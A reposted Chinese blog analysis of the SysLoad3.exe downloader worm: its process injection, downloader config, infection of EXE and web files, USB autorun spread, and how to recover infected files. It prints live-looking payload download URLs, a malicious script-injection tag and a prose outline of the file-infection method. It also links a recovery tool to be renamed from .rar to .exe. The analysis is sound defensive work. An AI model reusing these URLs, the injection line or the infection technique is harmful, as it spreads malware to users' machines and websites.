SysLoad3.exe木马

瑞星定义名为:Worm.DlOnlineGames
卡巴斯基定义名为:Trojan-Downloader.Win32.Agent
金山毒霸定义名为:Worm.MyInfect
赛门铁克定义名为:W32.Fubalca
驱逐舰定义名为:DLoader.Trojan

中文俗名“卖英
转载自水木社区网友coding的大作
[url]http://codinggg.spaces.live.com/blog/cns!8FF03B6BE1F29212!689.entry[/url]

适用于SysLoad3.exe V1.0.6版本:用于恢复被感染EXE程序,对于其他被感染的asp,aspx,htm,html,jsp,php文件,简单的替换掉特征串大概就可以了吧
       [url]http://mumayi1.999kb.com/pic/2007-04-02/b6z4d6al8r5e9d6t44dn.rar[/url]

         注意:空间不支持exe格式,请下载后把后缀由rar改成exe。

         使用前,请先断网,删除系统目录下的SysLoad3.exe以及1.exe,2.exe,...,7.exe,用IceSword删除临时目录下的那几个动态库。当任务管理器里没有iexplore.exe和notepad.exe的进程时,就可以运行这个恢复程序了。 

特别注意:运行过程中,不要去运行其他程序,有可能你运行的那个程序就是带毒的!! 

昨天下午加班回来,发现本本的行为相当诡异。看了看任务管理器,有几个Ie的进程和几个Notepad的进程有些可疑。然后看了看注册表,加了启动项:SysLoad3.exe,在Windows系统目录下面。唉,我是不用杀毒软件的,一般中了木马都是随便杀杀就完了,然而这个木马很讨厌,明显影响使用。木马程序做的这么土,也太匪夷所思了。用户都知道有干扰了,还怎么木马啊!不知道作者怎么想的~~

既然这么讨厌,那就干死他!不罗嗦,IDA伺候。我分析的是1.0.6版,程序逻辑比较简单,看看他都干啥了~~
       1. 一开始是在注册表中创建一个启动项: System Boot Check,调整到Debug权限,然后创建一个iexplore.exe的进程和一个Notepad.exe的进程。

2.自然是要把代码注入到远程进程去啦~~,作者注入的方式比较简单。设计的时候就把自己的加载地址改了,没用0x400000,而是用了一个很不常见的地址(0x13150000),估计是用notepad和iexplore都测试过,可以确认该地址不会被占用。然后根据PE的信息取出需要的空间大小(0x7000),从iexplore和notepad里分配该空间,最后把整个程序都copy过去,地址修正这些就全都免了。最后当然是木马最爱的函数CreateRemoteThread拉~~

3.嗯,干完活以后,sysload3.exe就没事干了。接下来就是iexplore和notepad大显身手~。

4.首先是iexplore干活,这个时候notepad也有一个重要的任务。它要检查看自己是本体还是被感染体。如果是被感染体,则需要把感染前的程序放出来干活,这样才不至于被用户发现。然后线程就等通知(Named Event: MySignal)。这个时候iexplore在干吗呢?接着看。

5.Iexplore(名字真长,后面叫IE好了~)先创建一个命名Mutex:MyDownload,告诉后面来的兄弟:有我在,你们都休息吧~。然后创建MySignal Event,置为无信号状态。接下来正式开始干活:IE的任务就是把病毒文件最新的配置信息取下来,根据新的配置信息更新本地的病毒版本。先是从[url]http://a.2007ip.com/css.css[/url]下载配置文件,保存在本地的名字就叫config.ini。
       配置文件的格式及注释如下:
       [config]
       Version=1.0.6
       NUM=7     ;这里指出下面有多少个任务(最多20个),每个任务都是把文件取下来,存在本地的名字就是同名的exe
       1=http://61.153.247.76/cald/01.gif
       2=http://61.153.247.76/cald/02.gif
       3=http://61.153.247.76/cald/03.gif
       4=http://61.153.247.76/cald/04.gif
       5=http://61.153.247.76/cald/05.gif
       6=http://61.153.247.76/cald/06.gif
       7=http://61.153.247.76/cald/07.gif
       UpdateMe=http://a.2007ip.com/5949645046.exe ;更新sysload3.exe本身
       tongji=http://if.iloveck.com/test/tongji.htm           ;唉,统计,作者就觉得这东西这么NB?还要统计一下。。。。
       hos=http://if.iloveck.com/test/hos.gif     ;这里非常出彩!作者苦心收集了一大堆流氓网站的名字,给我们种木马的时候,顺便给我
们把这些网站也给屏蔽了。全都记录在hosts文件里面,都解析成本地!虽然不清楚作者的本意是为了打击竞争对手(其他木马,嘿嘿~)或者是真的为人民服务,无论如何,赞作者~~!!虽然木马杀了,这个功能我还是会继续使用的,估计作者还会更新~哈哈~~
     
       好,任务都完成了以后,IE同学休息休息~~

6.Nopepad粉墨登场。
         这个坏家伙一上来就不干好事儿~,从Z盘到A盘挨个来,一个不落的去感染其他文件,包括EXE,ASP,ASPX,HTM,HTML,PHP,嗯,好像就这些。这是这个木马非常让我厌恶的地方。
          A.其EXE的感染的过程如下(大家不要看了去干坏事!):
          首先,依然是遍历所有文件。找到一个EXE后,检查它的最后4个字节是不是0x12345678。如果是,那么这个就是兄弟,下一位。
          找到一个没给感染的后干吗呢?自然就是感染他拉~~哈哈哈~~~。注意看哦,这里很关键:把sysload3.exe复制一份,叫做tempicon.exe,为啥是icon呢?不着急,马上就能看到原因了。tempicon有了以后,把目标程序的图标资源取出来,插入到tempicon里面去,这样的话,tempicon看起来就长得跟目标一样咯~。下一步呢,就是要把目标程序保存下来,于是就有了tempload.exe,这个文件就是把tempicon复制一份,然后把目标程序紧接着放在后面。最后加入8个自己的识别信息,前四个字节指出木马本身的长度,后四个字节就是前面说的0x12345678;
         B.web相关的文件的处理大同小异,临时文件是temphtml~,中间插入一个流氓javascript文件:          <script src=http://macr.microfsot.com/Noindex.js></script>

感染完整个硬盘后,就没50秒扫描一次又没有U盘,软盘之类的驱动器挂上。挂上了就在根目录下生成一个Autorun.inf,复制一份SysLoad3.exe过去,比较简单。

哦,好像检查了系统目录所在的分区没有去遍历。
     
         嗯,打完收工!

基本流程就是这样了~。要恢复的话,只要写个小程序,遍历一下硬盘里的exe,根据文件尾的标示(倒数第8-4个字节指出Sysload_Stub的长度,根据最后4个字节是否0x12345678判断是否是染毒文件)就可以恢复鸟~~~~至于其他的那些gizo0.dll,lgsy0.dll,msxo0.dll,rav20.dll之类的库,用IceSword从Explorer进程里卸载掉,然后就可以删掉啦~!
       
         总的来看,木马加入一个配置文件这个思路挺好的~新开发一个木马,就让他们去下载~呵呵。然而多次看到作者在使用CreatFile的时候,判断返回值总是用0,诡异~难道不是INVALID_HANDLE_VALUE???应该可以排除作者不知道的可能性,在FindFirstFile的用法里,作者就是用得INVALID_HANDLE_VALUE比较的。我书读得少,谁知道的话请一定留言告诉我,谢谢~~。
     
         分析过程挺麻烦的,唉~还好作者送上木马不忘附赠一个joke:I will by one BMW this year!如果作者靠这个能by到BMW,那这样一来我们的心情是不是可以愉悦很多哈~~嘿嘿~~

注意升级。

下载请到360安全网
[url]http://bbs.360safe.com/viewthread.php?tid=143311&extra=page%3D1[/url]
由于论坛系统的限制,需要注册一个360的帐号先。SORRY.
ps: CISRT的风险警告
麦英蠕虫专杀工具2 by 江民

下载地址:[url]http://download.jiangmin.info/jmsoft/ANIWormKiller.exe[/url]

本文转自starger51CTO博客,原文链接:http://blog.51cto.com/starger/22367 ,如需转载请自行联系原作者

SysLoad3.exe木马病毒地分析及清除方法相关推荐

  1. [转帖]详细讲解六大QQ病毒的特征以及清除方法

    [转帖]详细讲解六大QQ病毒的特征以及清除方法  一."QQ尾巴"病毒 病毒主要特征 这种病毒并不是利用QQ本身的漏洞 进行传播.它其实是在某个网站首页上嵌入了一段恶意代码,利用I ...

  2. 六大QQ病毒的特征以及清除方法

    六大QQ病毒的特征以及清除方法 一."QQ尾巴"病毒 病毒主要特征 这种病毒并不是利用QQ本身的漏洞 进行传播.它其实是在某个网站首页上嵌入了一段恶意代码,利用IE的iFrame系 ...

  3. U盘流行病毒autorun的分析及清除方法

    U盘流行病毒的形态为autorun名称的隐藏文件,后缀名为inf.exe等十种,通常表现为双击无法打开机器盘符,只能右击再点打开:系统变慢.有的没有感觉到异样,不大影响使用,但硬盘根目录下仍然有各种名 ...

  4. 新网银木马BankJp详细分析与清除

    病毒名:Win32.Troj.BankJp.a.221184 这是一个具有破坏性的新网银木马病毒.会查找"个人银行专业版"的窗口并盗取网银账号密码,如招商银行等:该病毒还会替换大量 ...

  5. 安卓强制恢复出厂_删文件、恢复出厂设置都没辙,安卓木马病毒xHelper该如何清除?...

    xHelper,一种于2019年3月被发现的木马病毒,主要被用作其他恶意软件(包括但不限于银行木马.勒索软件等)的传播工具,据说曾在不到5个月的时间里就成功感染了3.2万部智能手机和平板电脑. 卡巴斯 ...

  6. 一个简单的Android木马病毒的分析

    一.样本信息 文件名称: 一个安卓病毒木马.apk 文件大小:242867 byte 文件类型:application/jar 病毒名称:Android.Trojan.SMSSend.KS 样本MD5 ...

  7. 虚拟病毒分析与清除方法

    实验工具与环境配置 虚拟机软件:VMware Fusion 11.5.5 操作系统:Windows XP 虚拟病毒:VirtualVirus 进程管理器:IceSword 运行虚拟病毒 在 Windo ...

  8. 木马病毒的万能查杀方法

    "木马"程序会想尽一切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的办法.只要把Form的Visible属性设为False,ShowInTaskBar设为False,程 ...

  9. 警惕!最新勒索病毒incaseformat来袭!清除方法如下!

    该病毒所使用的delphi库中的 DateTimeToTimeStamp 函数中 IMSecsPerDay 变量的值错误,最终导致 DecodeDate 计算转换出的系统当前时间错误. 也因为上述原因 ...

  10. stup.exe木马病毒的手动解决办法

    病毒文件名:stup.exe 文件路径:C:\PROGRA~1\TENCENT\Adplus\stup.exe(多数情况下) (注:有可能是SOSO的地址栏插件,如果在以上路径找到了,那就是病毒了,要 ...

最新文章

  1. php个人中心代码,wordpress个人中心页author_user的相关判断处理php代码
  2. exportfs命令、NFS客户端问题、FTP介绍、使用vsftpd搭建ftp
  3. 【刷题】LOJ 6014 「网络流 24 题」最长 k 可重区间集
  4. 假如有人把支付宝存储服务器炸了(附文末福利)
  5. 用jQuery实现网页卷轴的效果
  6. sulin Python3.6爬虫+Djiago2.0+Mysql --实例demo
  7. mysql的分片系统_MySQL分片
  8. PyQt5在对话框中打开外部链接的方法
  9. 日均5亿查询量的京东订单中心,为什么舍MySQL用ElasticSearch?
  10. Spring框架学习笔记02:初探Spring——利用组件注解符精简Spring配置文件
  11. Java 蓝桥杯 芯片测试
  12. 2018-10-11
  13. [转载] python numpy 子数组_Python学习笔记3:Numpy入门
  14. oracle重建索引对空间的使用,分析oracle索引空间使用情况,以及索引是否需要重建...
  15. TDengine C/C++ Connector
  16. TortoiseGit 添加ssh key
  17. 三张图片无缝合成一张图片_在PS中如何将两张图片无缝拼接?
  18. app开发人员配置【职责】
  19. 攒机笔记十九:手机tf卡(microSD)
  20. 计算机化学博士点,2017年新增博士硕士授予单位公布!各高校博士、硕士学位授权点建设的总体情况如何?...

热门文章

  1. Mock Server介绍
  2. aix oracle 创建实例,11gR2 for AIX使用dbca创建数据库遇到ORA-03113错误的案例
  3. FFmpeg合并多个ts视频文件
  4. 2022年低压电工考试题及在线模拟考试
  5. PDF文件批量添加目录详细教程
  6. 【ANSYS命令流】Workbench中施加流体渗透压力载荷(超详细)
  7. 深度学习——常用数据标注工具总结
  8. css中背景颜色的代码,css背景代码是什么,css怎么控制背景颜色
  9. 速学堂java面试题_速学堂JAVA300集 第四章作业练习题
  10. 小迪渗透测试学习笔记(一)基础入门-概念名词